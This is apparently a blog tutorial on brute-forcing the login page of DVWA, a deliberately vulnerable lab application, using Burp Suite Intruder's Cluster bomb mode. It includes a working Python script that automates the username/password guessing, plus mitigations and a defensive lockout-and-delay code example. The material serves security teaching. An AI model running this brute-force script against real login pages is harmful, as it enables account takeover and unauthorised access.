Brute Force in DVWA (Low Security)

Himal Pandey
4 min read · Feb 25, 2021

• Brute Force

A brute force attack is a trial-and-error method of recovering a secret, such as a user's password or personal identification number (PIN), by submitting candidate values one after another until one is accepted. It works wherever the target accepts an unlimited number of attempts, which is exactly the situation at DVWA's Low security level.

Tools Required:

1. Burp Suite

2. Firefox

3. DVWA

4. XAMPP Control Panel

Burp Suite

Burp Suite is an integrated platform for security testing of web applications, designed for hands-on testers. Its Proxy sits between the browser and the target and lets you intercept and modify requests; its Intruder replays a captured request while substituting payloads into chosen positions, which is the feature this walkthrough relies on. With a little effort, anyone can start using the core features of Burp to test the security of their own applications.

Firefox

Firefox is one of the most popular browsers. Any browser that can be pointed at Burp's proxy will work; Firefox is convenient because its proxy settings are independent of the operating system's.

DVWA

DVWA (Damn Vulnerable Web Application) is a deliberately vulnerable PHP/MySQL web application built for practising web penetration testing. It is easy to set up and is intended for lab use only: it should never be exposed to the internet.

XAMPP Control Panel

XAMPP is a free, cross-platform bundle of Apache, MySQL/MariaDB, PHP and Perl; the XAMPP Control Panel is the window used to start and stop those services. DVWA needs both the Apache web server and the MySQL database running.

Step 1: Open the XAMPP control panel and start “Apache” and “MySQL”.

Figure:1

Step 2: Open the DVWA login page on localhost (http://127.0.0.1/dvwa).

Figure:2

Step 3: Log in to DVWA, click the “DVWA Security” button, change the security level from Impossible to Low and submit. The level is stored in the browser's “security” cookie, so it applies to every request the browser makes from now on.

Figure:3

Step 4: Make sure the browser is configured to use Burp Suite as its HTTP proxy (by default Burp listens on 127.0.0.1:8080), so that every request passes through Burp.

Figure:4

Step 5: Open the Brute Force page in DVWA.

Figure:5

Step 6: Make sure Intercept is turned on in Burp Suite's Proxy tab.

Figure:6

Step 7: Enter a random username and password and submit the form so that the login fails. The intercepted request appears in Burp Suite; at the Low level the form uses GET, so the username and password are visible in the query string. Right-click the request and choose ‘Send to Intruder’.

Figure:7

Step 8: Open the Intruder tab and set the attack type to Cluster bomb, which tries every payload from the first list against every payload from the second. Click Clear to remove the payload positions Burp marked automatically, then highlight the username value and the password value and click Add, so that only those two positions are marked.

Figure:8

Step 9: In the Intruder tab, go to the Payloads tab. Payload set 1 belongs to the first marked position, the username; add some likely usernames to the list.

Figure:9

Step 10: Switch to payload set 2, which belongs to the password position, and add candidate passwords to the list.

Figure:10

Step 11: Go to the Options tab, find the Grep - Match section and click Clear. When the login failed earlier, the page responded with “Username and/or password incorrect.”, so add exactly that string. Burp will now flag every response that contains it, which turns the results table into a simple pass/fail view.

Figure:11

Step 12: Preparation is complete. Click Start attack and the brute force run begins; the number of requests is the size of the username list multiplied by the size of the password list. When it finishes, sort the results by the grep column and look for the row whose box is unchecked: that response did not contain the error message, so its username and password are a valid pair for the login page.

Figure:12

Step 13: Log in with that pair and the user is logged in. Hence, the attack is successful.

Figure:13
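Steps 7 to 12 can be reproduced without Burp. The script below is an added example, not code from the original article: it sends the same GET request the Low-level form sends, pairs every username with every password exactly as a Cluster bomb does, and reports the pairs whose response lacks the grep string from Step 11. The base URL and the PHPSESSID value are placeholders you must take from your own lab, and the offline stand-in server with its two constructed accounts exists only so the logic can be run without DVWA.

```python
"""Cluster-bomb brute force against the DVWA (Low) login form, scripted.

Added example; not code from the original article or from DVWA.
Assumptions: DVWA at http://127.0.0.1/dvwa (placeholder), security level
already set to Low, and a PHPSESSID copied from a logged-in browser.
"""
import itertools
import urllib.parse
import urllib.request
from typing import Callable, Iterable, List, Tuple

# The grep-match string from Step 11: present on every failed login.
FAILURE_MARKER = "Username and/or password incorrect."


def dvwa_request(base_url: str, phpsessid: str) -> Callable[[str, str], str]:
    """Return a submit(username, password) function that performs one live
    request against DVWA and returns the response body (network access)."""
    def submit(username: str, password: str) -> str:
        qs = urllib.parse.urlencode(
            {"username": username, "password": password, "Login": "Login"})
        req = urllib.request.Request(f"{base_url}/vulnerabilities/brute/?{qs}")
        # The brute-force page sits behind DVWA's own login, so the session
        # cookie and the security-level cookie go with every request.
        req.add_header("Cookie", f"PHPSESSID={phpsessid}; security=low")
        with urllib.request.urlopen(req, timeout=10) as resp:
            return resp.read().decode("utf-8", errors="replace")
    return submit


def cluster_bomb(usernames: Iterable[str], passwords: Iterable[str],
                 submit: Callable[[str, str], str],
                 failure_marker: str = FAILURE_MARKER) -> List[Tuple[str, str]]:
    """Try every (username, password) combination, like Burp's Cluster bomb.

    Returns the pairs whose response does NOT contain the failure marker,
    i.e. the rows that would show an unchecked grep box in Intruder.
    """
    hits = []
    for user, pw in itertools.product(usernames, passwords):
        if failure_marker not in submit(user, pw):
            hits.append((user, pw))
    return hits


# --- constructed offline stand-in for a DVWA instance (not DVWA's code) ---
_FAKE_ACCOUNTS = {"admin": "password", "gordonb": "abc123"}  # constructed


def fake_dvwa(username: str, password: str) -> str:
    """Mimic the two responses the Low-level page returns."""
    if _FAKE_ACCOUNTS.get(username) == password:
        return f"<p>Welcome to the password protected area {username}</p>"
    return f"<pre><br />{FAILURE_MARKER}</pre>"


DEMO_USERS = ["admin", "gordonb", "smithy"]
DEMO_PASSWORDS = ["123456", "password", "abc123", "letmein"]


def run_demo() -> List[Tuple[str, str]]:
    """3 usernames x 4 passwords = 12 requests against the stand-in server."""
    return cluster_bomb(DEMO_USERS, DEMO_PASSWORDS, fake_dvwa)


if __name__ == "__main__":
    for user, pw in run_demo():
        print(f"hit: {user}:{pw}")
    # Against a live lab instead of the stand-in:
    # cluster_bomb(DEMO_USERS, DEMO_PASSWORDS,
    #              dvwa_request("http://127.0.0.1/dvwa", "<PHPSESSID>"))
```

Matching on the absence of the error string rather than the presence of a welcome string is the same choice Burp makes with Grep - Match, and it is the more robust one: a 500 error, a redirect to the login page or a changed success banner will all show up as a "hit" to investigate rather than silently disappearing.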

Problems caused by Brute Force Attack:

· Because the Low level imposes no limit or delay on failed logins, the attacker can submit as many username and password combinations as they like until one is accepted.

· Once the attacker holds valid credentials, they can read whatever personal data and use whatever functionality the account has access to.

Mitigation:

• Enforce strong passwords, so that short wordlists like the ones used above do not contain the right value.

• Use CAPTCHAs, at least after a few failed attempts, to stop fully automated guessing.

• Use Two-Factor Authentication (2FA), so that a guessed password alone is not enough to log in.

• Rename the default ‘admin’ account and avoid predictable usernames; a Cluster bomb is only cheap when the username list is short.

• Lock the account or add a delay after a small number of failed attempts, which is what DVWA's higher security levels do.
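The last two mitigations are the ones that directly defeat the Cluster bomb run above, and the block below shows them as server-side logic. It is an added example, not code from the article or from DVWA: it counts consecutive failures per username, refuses further attempts for a lockout window once a threshold is reached, and adds a fixed delay on every failure. The thresholds (3 failures, 900 seconds of lockout, 2 seconds of delay) and the demo account are illustrative assumptions.

```python
"""Per-account lockout and failure delay, as a brute-force mitigation.

Added example, not the article's or DVWA's code. Thresholds are illustrative.
"""
import hmac
import time
from dataclasses import dataclass, field
from typing import Callable, Dict

MAX_FAILURES = 3            # consecutive failures before lockout (assumed)
LOCKOUT_SECONDS = 900       # how long the account stays locked (assumed)
FAILURE_DELAY_SECONDS = 2   # delay added to every failed attempt (assumed)


@dataclass
class AccountState:
    failures: int = 0
    locked_until: float = 0.0


@dataclass
class LoginGuard:
    """Wraps a credential check with lockout bookkeeping.

    `check` is the real verifier (e.g. a password-hash comparison);
    `now` and `sleep` are injectable so the policy can be tested without
    actually waiting.
    """
    check: Callable[[str, str], bool]
    now: Callable[[], float] = time.monotonic
    sleep: Callable[[float], None] = time.sleep
    state: Dict[str, AccountState] = field(default_factory=dict)

    def login(self, username: str, password: str) -> str:
        """Return 'ok', 'bad' or 'locked'. The user-facing message for 'bad'
        and 'locked' should be identical so the attacker cannot tell which."""
        acct = self.state.setdefault(username, AccountState())
        t = self.now()
        if acct.locked_until > t:
            # Do not even evaluate the password while locked: a correct
            # guess must not be confirmable during the lockout window.
            return "locked"
        if self.check(username, password):
            acct.failures = 0
            return "ok"
        acct.failures += 1
        if acct.failures >= MAX_FAILURES:
            acct.locked_until = t + LOCKOUT_SECONDS
            acct.failures = 0
        # Slows every wrong guess; 12 pairs cost 24 s, 12,000 pairs cost hours.
        self.sleep(FAILURE_DELAY_SECONDS)
        return "bad"


# --- constructed demo pieces -------------------------------------------
class FakeClock:
    """Test clock: sleeping advances time instead of blocking."""
    def __init__(self) -> None:
        self.t = 0.0

    def now(self) -> float:
        return self.t

    def sleep(self, seconds: float) -> None:
        self.t += seconds


_DEMO_USERS = {"admin": "password"}  # constructed; real code stores hashes


def demo_check(username: str, password: str) -> bool:
    """Constant-time comparison against the constructed credential store."""
    expected = _DEMO_USERS.get(username, "")
    return hmac.compare_digest(expected.encode(), password.encode())


def make_guard(clock: FakeClock) -> LoginGuard:
    return LoginGuard(check=demo_check, now=clock.now, sleep=clock.sleep)


if __name__ == "__main__":
    clock = FakeClock()
    guard = make_guard(clock)
    for pw in ["123456", "letmein", "abc123", "password"]:
        print(f"admin:{pw} -> {guard.login('admin', pw)} (t={clock.t:.0f}s)")
    clock.t += LOCKOUT_SECONDS
    print(f"after lockout -> {guard.login('admin', 'password')}")
```

Two caveats a practitioner would raise: per-account lockout gives an attacker a way to lock legitimate users out by deliberately failing logins against their names, so production systems usually pair it with per-IP throttling and CAPTCHA rather than relying on it alone; and the guard creates state for every username it sees, including ones that do not exist, which is deliberate (unknown and known usernames must behave the same) but means the state store needs expiry.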

Conclusion:

Brute force attacks are used to get past authentication so the attacker can reach the data they are after. While this may sound like something only criminals would use, many security firms run brute force attacks to test their clients' systems, and DVWA's Low level is a safe place to see exactly how little it takes when no lockout or delay is in place.
